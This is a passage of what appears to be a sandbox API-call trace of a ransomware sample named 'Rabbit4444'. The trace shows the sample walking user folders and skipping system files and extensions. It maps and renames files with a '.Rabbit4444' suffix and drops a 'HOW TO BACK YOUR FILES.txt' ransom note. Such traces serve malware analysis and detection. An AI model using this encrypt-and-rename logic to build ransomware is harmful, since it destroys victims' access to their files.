(lpString1="..", lpString2=".") returned 1 [0070.883] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.883] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf391b673, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf391b673, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf391b673, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.884] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.884] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.884] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7385ce05, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x7385f521, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x738942ad, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x1c10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504773410", cAlternateFileName="150477~1")) returned 1 [0070.884] lstrcmpiW (lpString1="1504773410", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.884] lstrcmpiW (lpString1="1504773410", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.884] lstrcmpiW (lpString1="1504773410", lpString2="Rabbit4444.exe") returned -1 [0070.884] lstrcmpiW (lpString1="1504773410", lpString2=".") returned 1 [0070.884] lstrcmpiW (lpString1="1504773410", lpString2="..") returned 1 [0070.884] lstrcmpiW (lpString1="1504773410", lpString2="windows") returned -1 [0070.884] lstrcmpiW (lpString1="1504773410", lpString2="bootmgr") returned -1 [0070.884] lstrcmpiW (lpString1="1504773410", lpString2="pagefile.sys") returned -1 [0070.884] lstrcmpiW (lpString1="1504773410", lpString2="boot") returned -1 [0070.884] lstrcmpiW (lpString1="1504773410", lpString2="ids.txt") returned -1 [0070.884] lstrcmpiW (lpString1="1504773410", lpString2="NTUSER.DAT") returned -1 [0070.884] lstrcpyW (in: lpString1=0x130ec56, lpString2="1504773410" | out: lpString1="1504773410") returned="1504773410" [0070.884] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\1504773410", dwFileAttributes=0x0) returned 1 [0070.885] lstrlenW (lpString="1504773410") returned 10 [0070.885] lstrlenW (lpString="Rabbit4444") returned 10 [0070.885] lstrcmpiW (lpString1="1504773410", lpString2="Rabbit4444") returned -1 [0070.885] lstrlenW (lpString=".dll") returned 4 [0070.885] lstrcmpiW (lpString1="3410", lpString2=".dll") returned 1 [0070.885] lstrlenW (lpString=".lnk") returned 4 [0070.885] lstrcmpiW (lpString1="3410", lpString2=".lnk") returned 1 [0070.885] lstrlenW (lpString=".ini") returned 4 [0070.885] lstrcmpiW (lpString1="3410", lpString2=".ini") returned 1 [0070.885] lstrlenW (lpString=".sys") returned 4 [0070.885] lstrcmpiW (lpString1="3410", lpString2=".sys") returned 1 [0070.885] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\1504773410" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280813\\1504773410"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0070.886] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.886] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16219632736) returned 1 [0070.886] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=7184) returned 1 [0070.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0070.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0070.886] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1f10, lpName=0x0) returned 0x27c [0070.887] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1f10) returned 0x70000 [0070.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x104c10 [0070.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0070.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104c10 | out: hHeap=0xe0000) returned 1 [0070.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0070.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x104c10 [0070.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0070.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104c10 | out: hHeap=0xe0000) returned 1 [0070.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0070.889] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16220017867) returned 1 [0070.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0070.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0070.890] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.890] CloseHandle (hObject=0x27c) returned 1 [0070.890] CloseHandle (hObject=0x260) returned 1 [0070.890] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\1504773410.Rabbit4444") returned 164 [0070.890] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\1504773410" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280813\\1504773410"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\1504773410.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280813\\1504773410.rabbit4444"), dwFlags=0x1) returned 1 [0070.891] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35a4d42c, ftCreationTime.dwHighDateTime=0x1d327c2, ftLastAccessTime.dwLowDateTime=0x35a4d42c, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0x35a99a0d, ftLastWriteTime.dwHighDateTime=0x1d327c2, nFileSizeHigh=0x0, nFileSizeLow=0x1cd2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504779320", cAlternateFileName="150477~2")) returned 1 [0070.891] lstrcmpiW (lpString1="1504779320", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.891] lstrcmpiW (lpString1="1504779320", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.891] lstrcmpiW (lpString1="1504779320", lpString2="Rabbit4444.exe") returned -1 [0070.891] lstrcmpiW (lpString1="1504779320", lpString2=".") returned 1 [0070.891] lstrcmpiW (lpString1="1504779320", lpString2="..") returned 1 [0070.891] lstrcmpiW (lpString1="1504779320", lpString2="windows") returned -1 [0070.891] lstrcmpiW (lpString1="1504779320", lpString2="bootmgr") returned -1 [0070.891] lstrcmpiW (lpString1="1504779320", lpString2="pagefile.sys") returned -1 [0070.891] lstrcmpiW (lpString1="1504779320", lpString2="boot") returned -1 [0070.891] lstrcmpiW (lpString1="1504779320", lpString2="ids.txt") returned -1 [0070.891] lstrcmpiW (lpString1="1504779320", lpString2="NTUSER.DAT") returned -1 [0070.891] lstrcpyW (in: lpString1=0x130ec56, lpString2="1504779320" | out: lpString1="1504779320") returned="1504779320" [0070.891] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\1504779320", dwFileAttributes=0x0) returned 1 [0070.892] lstrlenW (lpString="1504779320") returned 10 [0070.892] lstrlenW (lpString="Rabbit4444") returned 10 [0070.892] lstrcmpiW (lpString1="1504779320", lpString2="Rabbit4444") returned -1 [0070.892] lstrlenW (lpString=".dll") returned 4 [0070.892] lstrcmpiW (lpString1="9320", lpString2=".dll") returned 1 [0070.892] lstrlenW (lpString=".lnk") returned 4 [0070.892] lstrcmpiW (lpString1="9320", lpString2=".lnk") returned 1 [0070.892] lstrlenW (lpString=".ini") returned 4 [0070.892] lstrcmpiW (lpString1="9320", lpString2=".ini") returned 1 [0070.892] lstrlenW (lpString=".sys") returned 4 [0070.892] lstrcmpiW (lpString1="9320", lpString2=".sys") returned 1 [0070.892] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\1504779320" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280813\\1504779320"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0070.893] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.893] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16220360699) returned 1 [0070.893] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=7378) returned 1 [0070.893] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0070.893] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0070.893] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1fe0, lpName=0x0) returned 0x27c [0070.894] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1fe0) returned 0x70000 [0070.895] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x104c10 [0070.895] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0070.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104c10 | out: hHeap=0xe0000) returned 1 [0070.895] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0070.895] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x104c10 [0070.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0070.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104c10 | out: hHeap=0xe0000) returned 1 [0070.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0070.895] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16220614967) returned 1 [0070.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0070.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0070.896] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.896] CloseHandle (hObject=0x27c) returned 1 [0070.896] CloseHandle (hObject=0x260) returned 1 [0070.896] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\1504779320.Rabbit4444") returned 164 [0070.896] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\1504779320" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280813\\1504779320"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\1504779320.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280813\\1504779320.rabbit4444"), dwFlags=0x1) returned 1 [0070.897] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c100a2, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3c100a2, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa4ce1b7c, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0070.897] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.897] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.897] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.897] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0070.897] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0070.897] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0070.897] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0070.897] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.897] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0070.897] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0070.897] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.897] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0070.897] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.897] lstrlenW (lpString="eventbeacons.dat") returned 16 [0070.897] lstrlenW (lpString="Rabbit4444") returned 10 [0070.897] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.897] lstrlenW (lpString=".dll") returned 4 [0070.897] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.897] lstrlenW (lpString=".lnk") returned 4 [0070.897] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.897] lstrlenW (lpString=".ini") returned 4 [0070.897] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.898] lstrlenW (lpString=".sys") returned 4 [0070.898] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.898] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3be9e93, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3be9e93, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa4ce1b7c, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0070.898] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.898] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.898] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.898] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0070.898] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0070.898] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0070.898] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0070.898] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.898] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0070.898] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0070.898] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.898] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0070.898] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.898] lstrlenW (lpString="imprbeacons.dat") returned 15 [0070.898] lstrlenW (lpString="Rabbit4444") returned 10 [0070.898] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.898] lstrlenW (lpString=".dll") returned 4 [0070.898] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.898] lstrlenW (lpString=".lnk") returned 4 [0070.898] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.898] lstrlenW (lpString=".ini") returned 4 [0070.898] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.898] lstrlenW (lpString=".sys") returned 4 [0070.898] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.898] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3be9e93, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3be9e93, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa4ce1b7c, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0070.899] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0070.899] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.899] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280813\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0070.899] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0070.899] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.901] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.901] CloseHandle (hObject=0x260) returned 1 [0070.901] CloseHandle (hObject=0x228) returned 1 [0070.901] GetCurrentThreadId () returned 0xd98 [0070.901] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122348 [0070.901] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811" [0070.901] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104ae8 | out: hHeap=0xe0000) returned 1 [0070.901] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122340 | out: hHeap=0xe0000) returned 1 [0070.901] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811" [0070.901] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811\\" [0070.901] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811\\.BFC0E91B00AE8A0620D3" [0070.901] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280811\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0070.905] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.908] FlushFileBuffers (hFile=0x228) returned 1 [0070.908] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.908] CloseHandle (hObject=0x228) returned 1 [0070.909] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811") returned 142 [0070.909] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.909] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x416d25ac, ftCreationTime.dwHighDateTime=0x1d32747, ftLastAccessTime.dwLowDateTime=0x8a8a5304, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf39685bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0070.909] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.909] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.909] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.909] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.909] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x416d25ac, ftCreationTime.dwHighDateTime=0x1d32747, ftLastAccessTime.dwLowDateTime=0x8a8a5304, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf39685bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.909] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.909] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.909] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.909] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.909] lstrcmpiW (lpString1="..", lpString2="..") returned 0 